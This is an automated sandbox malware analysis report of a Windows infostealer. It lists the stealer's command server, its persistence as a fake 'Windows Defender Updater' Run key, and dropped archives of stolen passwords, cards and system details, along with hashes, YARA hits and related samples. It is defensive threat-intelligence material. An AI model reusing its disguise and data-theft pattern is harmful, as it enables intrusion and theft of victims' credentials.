                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.jiyu-kobo.co.jp/5VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.fontbureau.com/designers85VXh2VBmA0.exe, 00000000.00000002.545615663.000000001DF02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5VXh2VBmA0.exe, 00000000.00000002.539503355.00000000130ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
[Contacted IP geolocation map; legend buckets: No. of IPs < 25%, 25% < No. of IPs < 50%, 50% < No. of IPs < 75%, 75% < No. of IPs]
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
92.249.45.113 | panel.cheater-zone.com | Germany | 47583 | AS-HOSTINGERLT | true
IP
192.168.2.1
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:790106
Start date and time:2023-01-23 21:23:58 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 31s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:5VXh2VBmA0 (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.winEXE@5/11@16/3
EGA Information:
• Successful, ratio: 100%
HDC Information:Failed
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 15
• Number of non-executed functions: 1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:24:59 | API Interceptor | 647x Sleep call for process: 5VXh2VBmA0.exe modified
21:25:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater C:\Users\user\AppData\Local\Temp\update_232309.exe / start
21:25:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater C:\Users\user\AppData\Local\Temp\update_232309.exe / start
21:25:25 | API Interceptor | 88x Sleep call for process: Zip.exe modified
21:25:26 | API Interceptor | 121x Sleep call for process: update_232309.exe modified
Match | Associated Sample Name / URL | Detection | Context
208.95.112.1 | sotema_4.txt.exe | malicious | ip-api.com/json/
208.95.112.1 | Payment.exe | malicious | ip-api.com/json/
208.95.112.1 | HEUR-Trojan.Win32.Crypt.gen-cd53d44c68b4b58f8.exe | malicious | ip-api.com/json/
208.95.112.1 | Loader.exe | malicious | ip-api.com/line/?fields=hosting
208.95.112.1 | OTP BOT CRACKED.exe | malicious | ip-api.com/json/
208.95.112.1 | taskshostw.exe | malicious | ip-api.com/csv/?fields=status,query
208.95.112.1 | HLCUBO1221264815 Seaway BL.pdf (2).jar | malicious | ip-api.com/json/
208.95.112.1 | 7024Zc8v11 | malicious | ip-api.com/json
208.95.112.1 | file.exe | malicious | ip-api.com/json/
208.95.112.1 | O8Kj4Gefdt.exe | malicious | ip-api.com/json/?fields=countryCode
208.95.112.1 | file.exe | malicious | ip-api.com/line/?fields=hosting
208.95.112.1 | Qp0NtYJBeV.exe | malicious | ip-api.com/json/
208.95.112.1 | a7uQ6Sphe1.exe | malicious | ip-api.com/line/?fields=countryCode
208.95.112.1 | HEUR-Trojan.Win32.Agent.gen-7a4df2fc82c0b553d.exe | malicious | ip-api.com/json/
208.95.112.1 | hEPTms2Nq1.exe | malicious | ip-api.com/json
208.95.112.1 | _IDEB_SCPRMO-1854705_230103_50592203.M1000827.PDF.exe | malicious | ip-api.com/line/?fields=hosting
208.95.112.1 | Virus.html | malicious | ip-api.com/json/?fields=status,country,regionName,city,query
208.95.112.1 | Virus.html | malicious | ip-api.com/json/?fields=status,country,regionName,city,query
208.95.112.1 | Virus.html | malicious | ip-api.com/json/?fields=status,country,regionName,city,query
208.95.112.1 | Virus.html | malicious | ip-api.com/json/?fields=status,country,regionName,city,query
Match | Associated Sample Name / URL | Detection | Context
ip-api.com | sotema_4.txt.exe | malicious | 208.95.112.1
ip-api.com | Payment.exe | malicious | 208.95.112.1
ip-api.com | HEUR-Trojan.Win32.Crypt.gen-cd53d44c68b4b58f8.exe | malicious | 208.95.112.1
ip-api.com | Audacity_x64_release.exe | malicious | 208.95.112.1
ip-api.com | Audacity_x64_release.exe | malicious | 208.95.112.1
ip-api.com | Loader.exe | malicious | 208.95.112.1
ip-api.com | OTP BOT CRACKED.exe | malicious | 208.95.112.1
ip-api.com | taskshostw.exe | malicious | 208.95.112.1
ip-api.com | HLCUBO1221264815 Seaway BL.pdf (2).jar | malicious | 208.95.112.1
ip-api.com | file.exe | malicious | 208.95.112.1
ip-api.com | O8Kj4Gefdt.exe | malicious | 208.95.112.1
ip-api.com | file.exe | malicious | 208.95.112.1
ip-api.com | Qp0NtYJBeV.exe | malicious | 208.95.112.1
ip-api.com | a7uQ6Sphe1.exe | malicious | 208.95.112.1
ip-api.com | HEUR-Trojan.Win32.Agent.gen-7a4df2fc82c0b553d.exe | malicious | 208.95.112.1
ip-api.com | 2c25b70f08a34cc52989882c4715854c4f488dacfa2c4.exe | malicious | 208.95.112.1
ip-api.com | hEPTms2Nq1.exe | malicious | 208.95.112.1
ip-api.com | _IDEB_SCPRMO-1854705_230103_50592203.M1000827.PDF.exe | malicious | 208.95.112.1
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
                                                                                                Virus.htmlGet hashmaliciousBrowse
                                                                                                • 208.95.112.1
Match | Associated Sample Name / URL | Detection | Context
AS-HOSTINGER | LTyC5aS5Mr35.exe | malicious | 31.220.106.55
 | Roominglists.exe | malicious | 2.57.90.16
 | UGF9G5Yeay.exe | malicious | 31.220.106.55
 | boJpCHgKfd.dll | malicious | 37.44.244.177
 | Remittance-Advice_cr92-Ef-01102023_pdf.htm | malicious | 93.188.166.128
 | INV80002-pdf-.exe | malicious | 2.57.90.16
 | SecuriteInfo.com.Trojan.GenericKD.65042030.19833.16095.exe | malicious | 2.57.90.16
 | SecuriteInfo.com.Win32.Evo-gen.15243.11743.exe | malicious | 2.57.90.16
 | N0pq5eqonB.dll | malicious | 37.44.244.177
 | N0pq5eqonB.dll | malicious | 37.44.244.177
 | npp.8.4.8.Installer.exe | malicious | 2.57.89.199
 | https://api.mixpanel.com/track?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDYyMjAzNDQsICJkaXN0aW5jdF9pZCI6ICJkYWZmY2VjMS0zNWRjLTQ3OTItOThjYy03ODMzZjRjNGM1OGQiLCAibWVzc2FnZV9pZCI6IDE0MDAwOTIsICJ0b2tlbiI6ICJlMzlhMGE0MGQ0OWRmMWNlMjI4ZjBmMWEwNzUwNWVjNCIsICJ0eXBlIjogImVtYWlsIiwgInVybCI6ICJodHRwczovL2F1ZGlvbWFjay5jb20vd29ybGQvcG9zdC9ib3R3LTctMjcifX0%3D&redirect=http%3A%2F%2FlKQAvsjcDgURefXIthTZcbLzWSJGmQZTipzjwEPjsTSTYMwgKV.dudacestasepresentes.com.br?pid/bWF0dGhldy5zYWthaUBnbG9iYWxmb3VuZHJpZXMuY29t | malicious | 45.93.137.228
 | Enquiry.exe | malicious | 2.57.90.16
 | file.exe | malicious | 31.220.54.148
 | file.exe | malicious | 31.220.54.148
 | file.exe | malicious | 31.220.54.148
 | PO102983459pdf.js | malicious | 194.59.164.67
 | file.dll | malicious | 153.92.5.27
 | file.exe | malicious | 2.57.90.16
 | https://mail.leaequity.info/?qngl&qrc=tsvetanka.savova@phillyshipyard.com | malicious | 45.132.240.86
TUT-ASUS | file.exe | malicious | 208.95.112.1
 | sotema_4.txt.exe | malicious | 208.95.112.1
 | Payment.exe | malicious | 208.95.112.1
 | HEUR-Trojan.Win32.Crypt.gen-cd53d44c68b4b58f8.exe | malicious | 208.95.112.1
 | Audacity_x64_release.exe | malicious | 208.95.112.1
 | Audacity_x64_release.exe | malicious | 208.95.112.1
 | file.exe | malicious | 208.95.112.1
 | Loader.exe | malicious | 208.95.112.1
 | OTP BOT CRACKED.exe | malicious | 208.95.112.1
 | taskshostw.exe | malicious | 208.95.112.1
 | HLCUBO1221264815 Seaway BL.pdf (2).jar | malicious | 208.95.112.1
 | 7024Zc8v11 | malicious | 208.95.112.1
 | file.exe | malicious | 208.95.112.1
 | O8Kj4Gefdt.exe | malicious | 208.95.112.1
 | file.exe | malicious | 208.95.112.1
 | Qp0NtYJBeV.exe | malicious | 208.95.112.1
 | a7uQ6Sphe1.exe | malicious | 208.95.112.1
 | HEUR-Trojan.Win32.Agent.gen-7a4df2fc82c0b553d.exe | malicious | 208.95.112.1
 | 2c25b70f08a34cc52989882c4715854c4f488dacfa2c4.exe | malicious | 208.95.112.1
 | hEPTms2Nq1.exe | malicious | 208.95.112.1
No context

Match | Associated Sample Name / URL | Detection | Context
C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll | nwY3YpWQVx.exe | malicious |
 | 5SUx8Md4kq.exe | malicious |
 | file.exe | malicious |
 | file.exe | malicious |
 | file.exe | malicious |
 | NicDx0BvqP.exe | malicious |
 | ngyoL1siem.exe | malicious |
 | SecuriteInfo.com.Exploit.ShellCode.69.5295.22971.rtf | malicious |
 | AvtoKomander_Installer.msi | malicious |
 | VFMPwzPWjM.exe | malicious |
 | CpLGtq4jBl.exe | malicious |
 | CpLGtq4jBl.exe | malicious |
 | 5Qg0FFYoQd.exe | malicious |
 | IBK_Minervasoft.exe | malicious |
 | PO BNB Trends.exe | malicious |
 | Bm6U0Vj6pa.exe | malicious |
 | NEW REQUIREMENT..xlsx | malicious |
 | kKEMJQNDL.exe | malicious |
 | doc2022020909100101019.exe | malicious |
 | hesaphareketi-01.pdf.exe | malicious |
Process: C:\Users\user\AppData\Local\Temp\Zip.exe
File Type: CSV text
Category: dropped
Size (bytes): 2343
Entropy (8bit): 5.374204171243879
Encrypted: false
SSDEEP: 48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoAPHZHpH+5HK+HKs:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/qo
MD5: 3F114A073575263E59307B55548FD5F4
SHA1: 971459D541646C4C6B382F06AAFA9F4147716568
SHA-256: 2417EC96E49CF7352D91892438478E961D8DC870FEB8E8821C732383CD9351F2
SHA-512: EA7B613DF726F230ADFEF841E4C8A753228B3AFAE7F2D2FDC2704892910F18254F2D9B31AA5E7D4C993137BCAE92B0FF77D9D31503E96D605DBF0589E42AD809
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

Process: C:\Users\user\AppData\Local\Temp\update_232309.exe
File Type: CSV text
Category: modified
Size (bytes): 2140
Entropy (8bit): 5.371730832466707
Encrypted: false
SSDEEP: 48:MxHKEYHKGD8Ao6+vxpNl1qHGiD0HKeGitHTG1hAHKKPJAmHKoAPHZHpH+Y:iqEYqGgAo9ZPlwmI0qertzG1eqKPJ/q3
MD5: 8D5284E805C10D2F4ABEEC24A26DDECA
SHA1: 22CC84B3067C6E457FAB34B7792E96AC3FA1E743
SHA-256: 760309005EBFE01DC4FCADAFE45DC919BFCB0C9EF08981671243C403DC8516D1
SHA-512: CD1C073BC90984DB2A883857DF0649DDD41A6ECEAECC4068145FE30819305CD041E916304E08F33C74682E74CD3806F5B294E80601A35964F25B24B6A38047FE
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

Process: C:\Users\user\AppData\Local\Temp\Zip.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=store
Category: dropped
Size (bytes): 791346
Entropy (8bit): 7.998032529446026
Encrypted: true
SSDEEP: 12288:CTSR/lyfYR7akBh642W0C9RQJWnOP0+qfr4qAq3sE3Q1d8GAPJEqzdza+uarRFQB:B/lygpzW4x79oWntVUtglPJJhuar/Qr1
MD5: 757838030B3055850B3729F9AE38C3D4
SHA1: 4A2E8B84FEAC658DB711394410F54B604BE399F1
SHA-256: 35281414BF1B446C6716F0404181CF2551F145546CBF42833865DD8ED3BE979D
SHA-512: FE4FDCFF4079AD4C6E9E1A343227E3464A18EF322F1B454BB57EA4A6EC4DCBFC4478B3100B9E90072361A0ECDB57A2AC436895D8542F2BA8CB24852DC5A0EAEC
Malicious: false
Reputation: low
Preview: PK........(.7V................Cards.txtPK........O.7V................Files\PK........).7Vll.,....L.......info.txt...N.0.EwK..;&.i...:..0.D.....p...4._...:..{.zu....KL...v..SO...'<.>P.Q...;..i..c..f'....../.k.pCG......iP.D.s.....w..G..$...cJ^..@Y.b6.s..nrl.....s<"..4j.,..Z............G...Q.iF..........;.....G..PK........(.7V................Passwords.txtPK........%.7V.f..*...T.......ProgramList.txt.Aj.0.E...a.-!f$.2...]d.....Ul...ec...,.S.P9.......K3.!F.(KM.tT.x...9$.V.-...dk.a9..G6...."....um...).(.,.q.|<.....M.y.`e..Z...S...~l......r..o.2,.@0.........S.@D..9X.yY.e.m:..Txh..."..s....7.Y..o~......n...Q..!QNf...6j.Fxf0..r......f..........<....=.."k..u..j'w.(...b.f..V>..i... ../PK........%.7V....>...e.......ProsessList.txt.U.n.0..#.....R/.A..Z....Wco..?.].../U/<D0..L.f.;;g...h.3Nj................2.'Y..f.|&..k.f.'....`-9..<..Z...i|.m...hwF..m'g...={i.-...$....R7.]{......`8...0n..$.m..}....A|.P...J>H..y.=.....I."...i..8.t..%.....X.^n\@O..'<!..........{.....uo

Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
File Type: Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 1743
Entropy (8bit): 4.466343434906543
Encrypted: false
SSDEEP: 48:Lcm1FZ6m3Zwm3MmqMVab+tcGanxcg0H13:LV9zJB3Fqwab+yGanOf
MD5: F7A190879742AF43AAAA289131299430
SHA1: 63FDBE7DC3C8BABE51A8885877CE19DE87942146
SHA-256: 1B81B79F7604DCCC9A4F1B15D1DB33355E5C372EB0EE176E41A79A8A5F27F5E4
SHA-512: A301574B245BD9E86522A34AB433EF884D9AADE347608C41D67C5A4850A4C953F75997926CFAF05AA7C4EFD1F9AD72C365FCF7333FA3B63CDD0772869153B61F
Malicious: false
Preview: -----------------------------------------..URL : https://support.google.com/installer/?product={8A69D345-D564-463c-AFF1-A69D9E530F96}&error=0x80040707..Title : Fix problems installing Chrome - Google Chrome Help..-----------------------------------------..-----------------------------------------..URL : https://support.google.com/chrome/answer/6315198?product={8A69D345-D564-463c-AFF1-A69D9E530F96}&error=0x80040707&visit_id=637962485686793996-3320600880&rd=1..Title : Fix problems installing Chrome - Google Chrome Help..-----------------------------------------..-----------------------------------------..URL : https://support.google.com/chrome?p=update_error..Title : Fix Chrome update problems & failed updates - Google Chrome Help..-----------------------------------------..-----------------------------------------..URL : https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_error&rd=1..Title : Fix Chrome update problems & failed updates - Google

Process: C:\Users\user\Desktop\5VXh2VBmA0.exe
File Type: Unicode text, UTF-8 text, with CRLF line terminators
Category: dropped
Size (bytes): 1364
Entropy (8bit): 5.065215317933012
Encrypted: false
SSDEEP: 24:c4cxPUwdVScxPUXUcxSTcHocxMocxtOtocxPUWEcxPUaptcxPUv9p1cxPUPbYcx9:x0PPdVS0PGU0WcHo0Mo0Uto0PHE0PFpJ
MD5: 187D97F5AAFF4553BDCE050BEFD951A2
SHA1: 596BE74C875F8C9CA08209F696060F03AFDA2E36
SHA-256: 43F6D6C018A8DC4837153C78124BFDAEF772FF00D67028A46DFCAFEABCEC18EF
SHA-512: FC608F5E80755ED97DEB818B9B37BBCC7C70EC46E7D6C62B97F4C408DD345190413026FB1C57B3600602421E4174E5E102D73C930F377109CE2B50D8788288D2
Malicious: false
Preview: Application Name : Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702....Version : 14.21.27702....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030....Version : 11.0.61030....Installed Date . 20190627....Application Name : Microsoft Office 64-bit Components 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Office Shared 64-bit MUI (English) 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016....Version : 16.0.4266.1001....Installed Date . 20200723....Application Name : Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005....Version : 12.0.21005....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005....Version : 12.0.21005....Installed Date . 20190627....Application Name : Microsoft Visual C++ 2012 x6
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2405
                                                                                                                                        Entropy (8bit):4.673606179261081
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:fmHtH+H9RHo+qH5HO5HtHOUH5HT1xHP5HLHymHPHtHFoHmHys:fQ5Y91oXNON5OUHNRVPNDyQf5FWQys
                                                                                                                                        MD5:D14A8BBC39F00D86CF0ABB19349E2CA7
                                                                                                                                        SHA1:FF6B7071553BA43B4EF50E65559AAD2619227BA3
                                                                                                                                        SHA-256:8B1E90DD28C1A179A85276AD1367D7F754DD793CA74B22B780D7BBEA2D19DFFC
                                                                                                                                        SHA-512:70EA5BC1B75824A139543BB6A44588B8B673F76FF3BDC2721E6821A85030B3F55DF48A8E5C40D362E72460372B38E1D421AAEB4E32208A747638D5C2E7659388
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:Name : RuntimeBroker....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : services....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : svchost....Name : WmiPrvSE....Name : backgroundTaskHost....Name : sihost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : winlogon....Name : svchost....Name : dwm....Name : svchost....Name : dllhost....Name : svchost....Name : RuntimeBroker....Name : ShellExperienceHost....Name : svchost....Name : svchost....Name : Registry....Name : WmiPrvSE....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : svchost....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : RuntimeBroker....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : svchost....Name : ABMVEJlLbfLiiIKWSVdcMdod....Name : RuntimeBroker....Name : svchost....Name : svchost....Name : svchost....Name : SearchUI....Name : backgroundTaskHost....Name : svchost....Name : HxTsr.
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):797919
                                                                                                                                        Entropy (8bit):7.948268932471244
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:Z1ui3zh7AJ2OdXprzlsvRjqunBJtx0i29YlyrTlvgXUZjLMlCHI2yw09k8FbU+UM:DDuJnx0BJgvl/Le8I2h09k8dUNM
                                                                                                                                        MD5:51DC59ED9BB3511AD0E6DD2B17768A4B
                                                                                                                                        SHA1:FDC663EFE761CC8FFD4E73E12A322DE8531B62F2
                                                                                                                                        SHA-256:56EB18214FA4184B87A53C008A2982E7FCC3AB903E6EA75B22E55C6F862501DC
                                                                                                                                        SHA-512:88E4DA29A5BDAFAEA44B902D5DF99CA5D6E9595A2F2F04E5BCC1F359BF6B7AF65DE1DB23AC44CE7F1572FEDD679CEC9A649B5830257194327408F83BB9FBF5CA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...4Gu...+.^/...s@d...YB..l0..x.b.[6 L2....$.. ..BD..".'..D!D.Bd..IH..:.}z.:.VuUO...7.<.g.T8....v...q..4;v...=n....F...n..;Yv.....{...n....v...-Z..8..y..u.~....])..n6......=;...]..{.v.7v}....^.....~}......W...uD.9..z.,..r.|;;X.......!X~.I..{..K[.....V.t.'e"...=n.l..\.q..yv\.KD.r.9a.q6=k.B.k<.....oF.c!AT...m..y6.....b@;%.z&.k+b.E!{...{.}wg...[..Q...>!.{;...c..3..f....}o....._.q...n.......6...* 6+.8.`6..t....W..c.9...2.".8>. ...[..5l..2.+..]...|...O>.../d-*...C.g.r...._.n.+.K...........R..G...<..\H..A..k..Z..'..E..?....3.....C....-.+...F...j...^`i.,.b.i.\...M..M.. #.:%.....0.~. ..OP...|~.3.c.....Rs0..4.........?)..-..........8..7..6..<....Z.......Q..>.s....t....k.0..|C.............!.3H9..../...........N.b.d....8............1g~.C...>*b.m[.Wfq%...-......2X..0.....].@=..../.H......[)............`....@.n...O..D....N..I....o......t...`Z.......p..r.V..,...
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):332
                                                                                                                                        Entropy (8bit):4.579461777700594
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:9lsCF2Rpj1hx0+A7JRXWQuGsLf15Ro1WcEuo8T:fjIpxXKRXWQzsLN5RJcfV
                                                                                                                                        MD5:00346F91FC4AAAE8CFA1ABA31A30615F
                                                                                                                                        SHA1:E4D7781282495A7C5EC8DF80087364BE1CEB97EF
                                                                                                                                        SHA-256:C42F1696272CEEDF6933E59DC8FCCFEE92E41C35183BA7DBB40032A603C8F99D
                                                                                                                                        SHA-512:C4FE386610B5CA975935496CF29414F985766B3B6BAF4E5F70BAC9F7E69DD99B8E4B3E5C2563F8429E13599755D39D0C5A14954839B59EC255C2475164C5D628
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:PC Name : 128757..Operating System : Microsoft Windows 10 Pro..Anti virus : Windows Defender..Firewall : None..Processor : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Memory (RAM) : 8.00 GB..-----------------------------------------------------------------------..-------------Developed By th3darkly [ https://gomorrah.pw ]-------------
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):407776
                                                                                                                                        Entropy (8bit):6.080910017085125
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6144:/+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWk:WPw2PjCLe3a6Q70zbR
                                                                                                                                        MD5:F75FE8D06448D07720D5456F2A327F08
                                                                                                                                        SHA1:DBA5D60848A7C24CE837225709D9E23690BB5CB3
                                                                                                                                        SHA-256:977998AEC486395EABA6CE5661648425A1A181CE18C2C87C6288AF62B87D5ECA
                                                                                                                                        SHA-512:EB05696F92881A698B7DEF0F8852286212A5EB235A2FF8A41460DEDBC6AE1964BFBEF613D3BEC736DF66525BF6E5A6C95FF5E0A71C904FA70B5C6675E2275A34
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
• Filename: nwY3YpWQVx.exe, Detection: malicious
• Filename: 5SUx8Md4kq.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: NicDx0BvqP.exe, Detection: malicious
• Filename: ngyoL1siem.exe, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.ShellCode.69.5295.22971.rtf, Detection: malicious
• Filename: AvtoKomander_Installer.msi, Detection: malicious
• Filename: VFMPwzPWjM.exe, Detection: malicious
• Filename: CpLGtq4jBl.exe, Detection: malicious
• Filename: CpLGtq4jBl.exe, Detection: malicious
• Filename: 5Qg0FFYoQd.exe, Detection: malicious
• Filename: IBK_Minervasoft.exe, Detection: malicious
• Filename: PO BNB Trends.exe, Detection: malicious
• Filename: Bm6U0Vj6pa.exe, Detection: malicious
• Filename: NEW REQUIREMENT..xlsx, Detection: malicious
• Filename: kKEMJQNDL.exe, Detection: malicious
• Filename: doc2022020909100101019.exe, Detection: malicious
• Filename: hesaphareketi-01.pdf.exe, Detection: malicious
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:Q.P...........!..................... ... ....... .......................`............@.................................\...O.... ..0................>...@......$................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H.......`e..............c..X...P .......................................R..p..4j../ux..;....B.6z.R...K.KT....i.r.p>.m~.p.?YQ.~16~v....J.h.}..k.......&...E....p..Ix..t;.uT7Ph..(.Rv:...y..qp...dX3...bu..{....*"..}....*V.(i.....(......}....*2.{....oj...*2.{....ok...*B..(....&..(....*...0...........oj........YE....{...............{...f...............f.......A...A...A...A...1...A...V...8<....t......{.....om...ol....or.....+U..om.....{.....o....oj...on.....o....o{...t.....o....o}.
                                                                                                                                        Process:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32256
                                                                                                                                        Entropy (8bit):5.050531187823917
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:KfkVQ748aUKN6C8/3g2L4QDL0Lk24jXPlfLoem/xYUIoPBsNJc:RW7PTKF8fPdDL42XPUIc
                                                                                                                                        MD5:AF07E88EC22CC90CEBFDA29517F101B9
                                                                                                                                        SHA1:A9E6F4AE24ABF76966D7DB03AF9C802E83760143
                                                                                                                                        SHA-256:1632FBFF8EDC50F2C7EF7BB2FE9B2C17E6472094F0D365A98E0DEC2A12FA8EC2
                                                                                                                                        SHA-512:B4575AF98071FC8D46C022E24BFB2C1567D7E5F3DE0D8FB5FEE6F876985C7780A5B145F645725FF27A15367162AA08490AC2F8DD59D705663094FE4E1EEEC7BC
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Zip.exe, Author: unknown
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
